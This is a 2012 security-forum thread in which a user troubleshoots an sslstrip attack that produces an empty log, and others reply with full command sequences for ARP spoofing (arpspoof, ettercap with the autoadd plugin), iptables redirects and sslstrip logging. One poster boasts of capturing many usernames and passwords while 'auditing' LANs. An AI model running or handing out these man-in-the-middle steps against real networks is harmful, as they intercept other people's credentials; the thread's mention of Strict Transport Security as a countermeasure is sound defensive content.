Results 1 to 9 of 9

Thread: I need help with sslstrip, seems to only be partially working

  1. #1
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3

    Default I need help with sslstrip, seems to only be partially working

    Hi Peeps, I'm new here (first post) and I'm posting in hope that someone may be of assistance.

    I'm currently trying to use sslstrip

    I'm using backtrack 5 r2, on a 32bit system

    I've tried following several tutorials and of all I've tried, none have seemed to work, or they do but in a limited fashion.

    I'm using the following commands

    echo "1" > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    sslstrip -a -l 10000 -w secret.log

    and in a new terminal window.

    arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1

    When I perform the first part, in the first terminal window, I get the following: sslstrip 0.9 by Moxie Marlinspike running...


    and in the arpspoof terminal window, it presents me with what I believe is the output I should be expecting. based on what I've seen in the tutorials.

    When I try to access pages on my target device, it appears to do the re-directs that it should be doing! and the connection is slower than it would be under normal conditions (as expected)

    However, when I try to access the secret.log file, it's completely empty!

    I've also tried another tutorial which is similar to the above, but which utilises ettercap too, but that doesn't appear to do anything for me either, but I'll get to that another time.

    Could someone please offer some help or guidance as to what exactly the problem may be?

    Any and all help, muchly appreciated, Thanks

  2. #2
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    5

    Default Re: I need help with sslstrip, seems to only be partially working

    I have practiced this attack on my LAN, but I use ettercap with IP Tables still commented out so that SSL Strip can do the work. I have not used APR Spoof to do the spoofing so I can't tell you if that is causing your issue. What I can tell you is that when I use ettercap, the output when a PC on my LAN gets "attacked" shows up in the ettercap output window. I suggest giving this a try over arpspoof, I ran the ettercap GTK just because I and familiar with the setup to start arp spoofing, and I can though in some DNS spoofing if necessary, but you can of course run it from the command line just as quickly as arpspoof. Another way you can tell if it is just the logging that is screwed up is by looking at the site in the browser bar, it will make HTTPS sites HTTP on the initial presentation of the page.

    The only issue that i have ran into with this attack is that it does not always grab the credentials, for example, I will go to a few sites, facebook, paypal, ebay. Then try it a second time and it might miss paypal for instance. Haven't nailed down why this happens. Hope you can get something out of this.

    Ech3l0n

  3. #3
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2

    Default Re: I need help with sslstrip, seems to only be partially working

    Strict Transport Security

    Here's some good info on it:
    http://tools.ietf.org/html/draft-iet...ansport-sec-09

  4. #4
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: I need help with sslstrip, seems to only be partially working

    I had a bad experience using all kind of things and I never was able to even arppoisson again. I used ettercap + sslstrip, sslstrip + arpspoof, and never was able to get any password anymore..There is some script by comaX, but it did not work either.

    I used to audit lan's with ettercap + sslstrip, and man I caught many many user and passwords, I documented them all..One day It just stop working for no apparent reason..Why?..I do not know..This is my very own personal experience, the scenario are pretty much the same in my case, trying to audit some lan's, different routers.

    I'm now trying another techniques and still reading, but somehow, and again in my case, it stop working...Still looking for a reason. I'm using wireshark to analyze traffic over port 80, TCP, etc.

    Try this hoping it can help you:

    1. Need to mod the etter.conf (nano /etc/etter.conf). go down to : "Linux section", uncomment lines under "if you use iptables" ------->"#redir_command_on =" and "#redir_command_off =". They should look like this: "redir_command_on =" and "redir_command_off ="
    2. Make sure the first section: [privs] has the next:
    ec_uid = 0
    ec_gid = 0
    3. open a terminal and type: iptables -t nat --flush and then type : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    4. then type : sslstrip --ssl --favicon --write "the name of your file with path" (you can use letters instead of whole words: --ssl = -s, --write = w, it is a matter of taste)
    5. Open a second terminal and run: ettercap -Tqi "your iface" -M arp:remote /ip, ip range or all ip's/ /gateway ip/ -P autoadd

    The use of "ettercap -Tqi wlan0 (it sets the forwarding on the interface i, and use Text mode in Quiet mode = Tqi)
    The use of -M arp:remote enables the Mitm, arp spoofing and remote means 2 way-poisson, in this case what is between the 2 pair of slashes (// //)

    The use of the -P means you are going to use a plugin, which one? "autoadd", this means any pc connected after the ettercap execution, will be added to the data base along with the others already poissoned. And this will happen to any client connected in the lan after the ettercap execution. Great plugin.....

    All this is in the ettercap manual (type man ettercap and read it).

    Try it and see what happens...

    Luck.
    Last edited by maverik35; 06-12-2012 at 10:38 AM.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    2

    Default Re: I need help with sslstrip, seems to only be partially working

    like i said, your issue is most likely caused by websites enforcing strict transport security. try different websites/browsers to see if thats the issue.

    but in general, when im lost while trying to figure out something, i go back to basic, at a conceptual level.

    so what are we trying to do. we want to intercept a stream of data sent in packets from a target machine and re-direct it to another service to analyse it. what is the data we want? where does it come from? where is it going? what do we want to do with it? a graphical schema helps.

    on the attacker's machine:
    is eth/wlan0 monitoring?
    which services/ports are used?
    is the traffic pre-routed correctly?
    is the service/port where traffic is pre-routed to up&running?
    what is expected of that service?
    tools like ifconfig, nmap, iptables, wireshark, etc. can help here.

    on the victim's machine:
    which website us it trying to reach?
    what are the security measures of that website?
    which services/ports are used to establish connection?
    which agent/browser is being used?
    what are the security rules enabled on that browser?

    HTH

  6. #6
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3

    Default Re: I need help with sslstrip, seems to only be partially working

    Thanks guys

    Maverik, I tried what you suggested, I had already modified the etter.conf file as you described, I double checked it just now when I followed your suggestion.

    unfortunately, I'm getting more or less the same results as before, the log file still isn't being logged to, it's in a directory with the correct permissions and everything!

    I still find it odd. The target device is being re-directed to http pages, instead of https as it should be so either there is no listening occurring (?) or there's some kind of error preventing the log from being written to, or at least that's my thinking currently.

    I'm working through the ettercap man file, it's pretty comprehensive, I'll continue to look through it

    Is there another way to achieve what I'm trying, without using ettercap? I don't think ettercap is the cause of the problem, I may be wrong here but it's just puzzling and I'd like to try every possible way before giving up.

    is it possible it's a hardware issue? or is this a bug?

  7. #7
    Just burned their ISO
    Join Date
    Sep 2011
    Location
    Matrix
    Posts
    18

    Default Re: I need help with sslstrip, seems to only be partially working

    Hello,

    Seems like the problem is old. I know this issue, i had the same a few month ago.

    After looking here and there i found out, that this issue is there since BT5/BT5R1 ( don't know it right now ). -> Seems like that it works still on BT4 and and and...

    I will search out the old topics and will post it here =)

  8. #8
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    3

    Default Re: I need help with sslstrip, seems to only be partially working

    Quote Originally Posted by bambuka View Post
    Hello,

    Seems like the problem is old. I know this issue, i had the same a few month ago.

    After looking here and there i found out, that this issue is there since BT5/BT5R1 ( don't know it right now ). -> Seems like that it works still on BT4 and and and...

    I will search out the old topics and will post it here =)
    I've heard in many places that bt4 just seems to work when bt5 doesn't, however I've obtained an iso for bt4 and for some reason it just won't install on this machine, and instead keeps kicking up issues about being unable to mount, I'm wondering if maybe I have too many partitions on this machine, but when I try installing on another machine with only one installation of ubuntu I have exactly the same problem.

    Also though, on this machine, the one with bt5 already installed, I tried booting the bt5 iso and I get the exact same problem that's happening with bt4, which is odd, considering that's the exact same method I used to install it on here, though I didn't have as many partitions installed when I installed bt5 initially, I'm wondering about how to properly remove partitions, I've tried using gparted before and resulted in removing the grub (or something along those lines) and so I had to do a reinstall of ubuntu to restore the netbook to full working order, which resulted in me being back to square one with regards to how many partitions I had installed and with currently no way of solving that problem, annoyingly, anyone offer any tips on this problem?

    thanks!

  9. #9
    Just burned their ISO
    Join Date
    Mar 2012
    Posts
    16

    Default Re: I need help with sslstrip, seems to only be partially working

    cd /pentest/web/sslstrip

    echo '1' > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    arpspoof i- wlan0 192.168.0.1

    python sslstrip.py -l 8080

    tail -f sslstrip.log

    This is how i would do it
    Then everything would display in the tail shell.

Similar Threads

  1. Parsing SSLStrip with definitions.sslstrip in easy-cred
    By ericmilam in forum BackTrack 5 Beginners Section
    Replies: 0
    Last Post: 05-31-2011, 08:39 PM
  2. SSLStrip working/failing randomly
    By v3rsificator in forum OLD BackTrack 4 Software Related Issues
    Replies: 0
    Last Post: 12-16-2009, 01:18 PM
  3. D-link routers with captcha... authentication partially broken
    By Jac01 in forum OLD General IT Discussion
    Replies: 0
    Last Post: 05-20-2009, 05:12 AM
  4. WPA (partially) cracked
    By Re@lity in forum OLD General IT Discussion
    Replies: 2
    Last Post: 11-10-2008, 08:49 PM
  5. Toshiba Satelitte l10 (psl10e) partially works
    By suicide-c in forum OLD BT3beta NON-WORKING HARDWARE
    Replies: 2
    Last Post: 06-16-2008, 02:15 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •